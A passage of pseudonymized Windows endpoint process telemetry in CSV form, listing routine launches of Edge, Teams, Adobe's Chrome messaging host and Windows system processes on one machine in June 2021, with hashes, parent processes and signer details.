00:52:50.752902500+00:00,0f849762-2396-47db-bba6-fe1443c67fbb,computerpii_0a470890c60768167990033d701e7bd881398861,154890,False,10.7740.19041.1052,False,11540474045171857,,11540474045171858,2021-06-23 00:51:45.806583600+00:00,8756,2021-06-23 00:51:45.806583600+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,8756,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 00:51:45.888052400+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,0.0,1.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1271,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:46.590583300+00:00,19920,WCChromeNativeMessagingHost.exe,"""WCChromeNativeMessagingHost.exe""  chrome-extension://efaidnbmnnnibpcajpcglclefindmkaj/ --parent-window=0 ",PortableExecutable,2021-05-28 05:59:00+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe,171232,4b700f688d0bf07dc2f7cfc658378a01,f2399c9999ba49e7952598df3f95d3854ee69357cc9073b5e54c63a5f7861862,990df54a9fd6c438d31522aecefc71ea0f04f869,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:45.806583600+00:00,8756,cmd.exe,"cmd.exe /d /c ""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe"" chrome-extension://efaidnbmnnnibpcajpcglclefindmkaj/ --parent-window=0 < \\.\pipe\chrome.nativeMessaging.in.d6a7ee70a7383142 > \\.\pipe\chrome.nativeMessaging.out.d6a7ee70a7383142",False,2021-06-23 00:51:42.915074600+00:00,11880,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:46.801832700+00:00,2021-06-23 00:52:50.753457200+00:00,4c18c346-2fb4-40ea-84d8-1266fde9cbc6,computerpii_0a470890c60768167990033d701e7bd881398861,154909,False,10.7740.19041.1052,False,11540474045171857,,11540474045171861,2021-06-23 00:51:45.806583600+00:00,8756,2021-06-23 00:51:45.806583600+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,8756,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 00:51:45.888052400+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,0.0,1.0,,0.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Adobe Systems Inc.,Adobe Create PDF,21.5.20048.436468,,WCChromeNativeMessagingHost.exe,Adobe Create PDF plug-in listener for Chrome
+1272,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:47.457644500+00:00,10768,msedge.exe,"""msedge.exe"" --type=renderer --field-trial-handle=1988,3446608907217918886,11874100668059788691,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4024 /prefetch:1",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:47.896275600+00:00,2021-06-23 00:52:50.753864+00:00,9b3077b6-3ab2-486b-866b-68ed8d5fec18,computerpii_0a470890c60768167990033d701e7bd881398861,154923,False,10.7740.19041.1052,False,11540474045171833,,11540474045171862,2021-06-23 00:51:42.015515900+00:00,20024,2021-06-23 00:51:42.015515900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,20024,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 00:51:42.099396700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+1273,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:48.068452700+00:00,18340,msedge.exe,"""msedge.exe"" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1988,3446608907217918886,11874100668059788691,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6480 /prefetch:8",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:48.189348600+00:00,2021-06-23 00:52:50.753951+00:00,47f0b94c-7bcd-4102-86f3-4bc5d351ed83,computerpii_0a470890c60768167990033d701e7bd881398861,154926,False,10.7740.19041.1052,False,11540474045171833,,11540474045171863,2021-06-23 00:51:42.015515900+00:00,20024,2021-06-23 00:51:42.015515900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,20024,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 00:51:42.099396700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,1.0,1.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+1274,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:48.225316800+00:00,3976,identity_helper.exe,"""identity_helper.exe"" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1988,3446608907217918886,11874100668059788691,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6332 /prefetch:8",PortableExecutable,2021-06-18 23:49:38.664048500+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.54\identity_helper.exe,1080720,33098278b86f6e967f5e0f66da8192fa,dbe0ea072c1e26f07ae34f6b721074635048644ef14fce622e4097f05b6684c2,c345ea4721c3bafc8f7592f97f0407541b464904,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:48.387315500+00:00,2021-06-23 00:52:50.754036600+00:00,a56a4a03-1752-4182-a537-f9a7e5cad980,computerpii_0a470890c60768167990033d701e7bd881398861,154929,False,10.7740.19041.1052,False,11540474045171833,,11540474045171864,2021-06-23 00:51:42.015515900+00:00,20024,2021-06-23 00:51:42.015515900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,20024,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 00:51:42.099396700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,,Microsoft Edge,91.0.864.54,PWA Identity Proxy Host,identity_helper.exe,PWA Identity Proxy Host
+1275,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:49.715649300+00:00,572,wlrmdr.exe, -c -s 0 -f 0 -t Empty -m Empty -a 10 -u Empty,PortableExecutable,2021-02-17 04:34:46.345022800+00:00,C:\Windows\System32\wlrmdr.exe,68184,ef9bba7a637a11b224a90bf90a8943ac,2fda95aafb2e9284c730bf912b93f60a75b151941adc14445ed1e056140325b1,4747ec6efd2d41e049159249c2d888189bb33d1d,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-22 11:17:36.425662+00:00,13120,winlogon.exe,WinLogon.exe -SpecialSession,True,2021-06-22 11:17:36.333146300+00:00,19212,\Device\HarddiskVolume3\Windows\System32\smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:49.812007700+00:00,2021-06-23 00:52:50.755194300+00:00,c26b10b2-136f-4733-8193-d96f06507616,computerpii_0a470890c60768167990033d701e7bd881398861,154960,False,10.7740.19041.1052,False,11540474045171720,,11540474045171869,2021-06-22 11:17:36.425662+00:00,13120,2021-06-22 11:17:36.425662+00:00,\Device\HarddiskVolume3\Windows\System32\winlogon.exe,13120,18560,ActiveProcessStartkey,C:\Windows\System32,907776,1977-08-22 04:06:37+00:00,2021-04-14 01:10:22.068262900+00:00,2021-06-22 11:17:36.426909300+00:00,2021-04-14 01:10:22.046876900+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,0.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,WLRMNDR.EXE,WLRMNDR.EXE,Windows logon reminder
+1276,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:49.928517600+00:00,17256,taskhostw.exe,taskhostw.exe SyncFromCloud,PortableExecutable,2021-04-14 01:10:22.932389100+00:00,C:\Windows\System32\taskhostw.exe,97096,564e4806ab18f93b93d551cd10c1598e,0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad,fed4b4a753a9541389aa670c69e624be07569ccd,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:49.991268200+00:00,2021-06-23 00:52:50.755281700+00:00,b4ad62d8-2cd5-48b1-b54d-29f12ca95331,computerpii_0a470890c60768167990033d701e7bd881398861,154963,False,10.7740.19041.1052,False,11540474045136925,,11540474045171870,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,taskhostw.exe,taskhostw.exe,Host Process for Windows Tasks
+1277,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:50.730337100+00:00,9460,msedge.exe,"""msedge.exe"" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1988,3446608907217918886,11874100668059788691,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6808 /prefetch:8",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:50.816331100+00:00,2021-06-23 00:52:50.755457200+00:00,fe80c7db-888b-4c47-ae5f-8511e0bc4f04,computerpii_0a470890c60768167990033d701e7bd881398861,154971,False,10.7740.19041.1052,False,11540474045171833,,11540474045171872,2021-06-23 00:51:42.015515900+00:00,20024,2021-06-23 00:51:42.015515900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,20024,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 00:51:42.099396700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+1278,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:53.807212200+00:00,5032,SettingSyncHost.exe,SettingSyncHost.exe -Embedding,PortableExecutable,2021-02-17 04:35:15.621915800+00:00,C:\Windows\System32\SettingSyncHost.exe,968528,e60933f971f523d62331bc69b79f00b3,321656887526b439967b377c20c3ae04f48b11a77eea11f7febe47d30b3f7bc7,aaef92361eedd41aea3698c96b6fc386cb8a8a69,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:53.863356600+00:00,2021-06-23 00:52:50.756574700+00:00,719b9816-6698-4392-a418-aba2f1acbef9,computerpii_0a470890c60768167990033d701e7bd881398861,155011,False,10.7740.19041.1052,False,11540474045136908,,11540474045171879,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,SettingSyncHost,SettingSyncHost.exe,Host Process for Setting Synchronization
+1279,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:54.249139100+00:00,19640,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1776,6404088009311199867,3082750514405554529,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --enable-sandbox --native-window-open --preload=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar\lib\renderer\experienceRenderer\FilePII_81eb8107464d558b2d7094d41551620aa9ac0a03.js"" --background-color=#fff --guest-instance-id=5 --enable-blink-features --disable-blink-features --hidden-page --node-integration-in-subframes --enable-websql --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2720 /prefetch:1 --msteams-process-type=experience-renderer",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:39.754689300+00:00,1564,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-23 00:51:38.356200500+00:00,14744,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:54.323049700+00:00,2021-06-23 00:52:50.756808100+00:00,83da145b-663f-4d27-a687-8f2c7b902857,computerpii_0a470890c60768167990033d701e7bd881398861,155019,False,10.7740.19041.1052,False,11540474045171817,,11540474045171880,2021-06-23 00:51:39.754689300+00:00,1564,2021-06-23 00:51:39.754689300+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1564,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-23 00:51:39.765150300+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+1280,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:55.494177800+00:00,15116,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1776,6404088009311199867,3082750514405554529,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --no-sandbox --no-zygote --preload=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar\lib\pluginhost\FilePII_362d0e2af8f9714023b734d6d78e953a406c079a.js"" --background-color=#fff --enable-websql --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:1 --msteams-process-type=pluginHost",PortableExecutable,2021-05-18 